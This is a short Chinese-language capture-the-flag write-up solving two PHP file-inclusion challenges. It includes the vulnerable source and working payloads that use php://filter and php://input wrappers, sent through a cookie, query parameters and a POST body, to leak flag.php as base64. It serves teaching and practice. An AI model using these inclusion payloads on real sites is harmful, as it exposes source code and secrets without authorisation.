本题来源攻防世界
解题思路:
首先分析代码,将cookie中‘language’的值传入lan
在后续又使用include调用了lan这个变量,因此可以从此处写入读取flag.php的payload
可以使用burpsuite进行抓包后添加cookie值
name:language
value:php://filter/read=convert.base64-encode/resource=/var/www/html/flag
得到base64加密后再进行解码即可得到flag
第二题
fileinlucde
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET["file1"]) && isset($_GET["file2"]))
{
$file1 = $_GET["file1"];
$file2 = $_GET["file2"];
if(!empty($file1) && !empty($file2))
{
if(file_get_contents($file2) === "hello ctf")
{
include($file1);
}
}
else
die("NONONO");
}
分析代码可知,
file1 = flag.php 使用http://filter伪协议来获取源代码
file2 = hello ctf 想要让函数getcontent返回字符串,可以使用php://input伪协议绕过
因此可以构造如下payload
?file1=php://filter/convert.base64-encode/resource=flag.php&file2=php://input
同时在post中传入 hello ctf=hello ctf
因为post=传参是以键值对的形式进行传输的
之后打开burpsuite进行抓包,抓包后的结果去掉键只保留值 即 hello ctf 发送即可得到base64加密,解密即可得到flag